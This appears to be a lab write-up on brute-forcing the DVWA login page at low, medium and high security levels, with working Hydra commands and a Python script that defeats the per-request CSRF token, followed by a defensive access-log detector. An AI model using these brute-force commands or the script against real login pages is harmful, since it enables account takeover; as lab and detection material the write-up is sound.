Clues for finding the login password at the low level:
* Look at the cookie after an incorrect login as admin:
"PHPSESSID: xxxxxxxxxxxxxxxxxxxxxxxxxxx"
"security (the one value to change): low & medium"
"error message: ......................?"
I use the hydra tool to attack the target and find the username and password. Hydra cheat sheet for attacking the target from the terminal:
```
hydra -L /home/users/user.txt -P /home/users/passwd.txt 'http-get-form://ip target/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx; security=low:F=Username and/or password incorrect'
```
Clues for finding the login password at the medium level:
* Same as the low level; the hydra brute-force command changes only slightly:
```
hydra -L /home/users/user.txt -P /home/users/passwd.txt 'http-get-form://ip target/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx; security=medium:F=Username and/or password incorrect'
```
Clues for finding the login password at the high level:
The approach used for the low and medium levels does not find the password. I use a Python script to find the password at the high level; this is the Python brute-force script:
```
from sys import argv
import requests
from bs4 import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv

# set up our target, cookie and session
url = 'http://ip_kita/DVWA/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID': '7bpok4vi2ekeskfdcnqho0q1mt'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)


def checkSuccess(html):
    '''
    checkSuccess
    @param: html (String)
    Searches the response HTML for our specified success message
    '''
    # get our soup ready for searching
    soup = Soup(html, 'html.parser')
    # check for our success message in the soup
    search = soup.find_all(string=success_message)
    # return the brute force result
    return bool(search)


# Get the initial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source, 'html.parser')
csrf_token = soup.find_all(attrs={"name": "user_token"})[0].get('value')

# Display before attack
print('DVWA URL: ' + url)
print('CSRF Token=' + csrf_token)

# Stays False if the password file is empty or nothing matches
success = False

# Loop through our provided password file
with open(filename) as f:
    print('Running brute force attack...')
    for password in f:
        # Strips whitespace from the password list entry and displays the try
        password = password.strip()
        print('password tried: ' + password)
        # setup the payload
        payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
        r = s.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)
        if not success:
            # if it failed the CSRF token will be changed. Get the new one
            soup = Soup(r.text, 'html.parser')
            csrf_token = soup.find_all(attrs={"name": "user_token"})[0].get('value')
        else:
            # Success! Show the result
            print('Password is: ' + password)
            break

# We failed, bummer.
if not success:
    print('Brute force failed. No matches found.')
```
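Seen from the server side, every attempt above is a GET request carrying `username` and `password` in the query string, so the guessing is visible in the web access log whether or not a `user_token` is attached. The following is an added example, not part of the original write-up, that flags a source submitting many distinct passwords for one account within a short window. The log format, IP addresses, threshold and window are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

BRUTE_PATH = "/DVWA/vulnerabilities/brute/"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" \d{3}')

def sample_log():
    """Constructed sample lines (Apache common log format); not real traffic."""
    fmt = ('{ip} - - [10/Mar/2024:10:00:{s:02d} +0000] "GET {path}?username=admin'
           '&password={pw}&Login=Login&user_token=t{s} HTTP/1.1" 200 4521')
    guesses = ["123456", "letmein", "qwerty", "dragon", "monkey", "abc123"]
    lines = [fmt.format(ip="198.51.100.7", s=2 * i, pw=pw, path=BRUTE_PATH + "index.php")
             for i, pw in enumerate(guesses)]          # one guess every 2 seconds
    lines += [fmt.format(ip="203.0.113.20", s=30 + i, pw=pw, path=BRUTE_PATH)
              for i, pw in enumerate(["Summer2023", "Summer2024"])]  # a user mistyping
    lines.append('203.0.113.20 - - [10/Mar/2024:10:00:40 +0000] "GET /DVWA/index.php HTTP/1.1" 200 1200')
    return "\n".join(lines)

def parse(line):
    """Return (ip, username, password, time) for a login attempt, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, target = m.groups()
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    if not parts.path.startswith(BRUTE_PATH) or "username" not in qs or "password" not in qs:
        return None
    return ip, qs["username"][0], qs["password"][0], datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag (ip, username) pairs with >= threshold distinct passwords inside the window."""
    recent, flagged = defaultdict(deque), set()
    for rec in filter(None, map(parse, log_text.splitlines())):
        ip, user, pw, when = rec
        q = recent[(ip, user)]
        q.append((when, pw))
        while when - q[0][0] > window:     # drop attempts older than the window
            q.popleft()
        if len({p for _, p in q}) >= threshold:
            flagged.add((ip, user))
    return flagged

if __name__ == "__main__":
    for ip, user in sorted(detect(sample_log())):
        print(f"possible brute force: {ip} -> account {user!r}")
```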
Thanks for reading.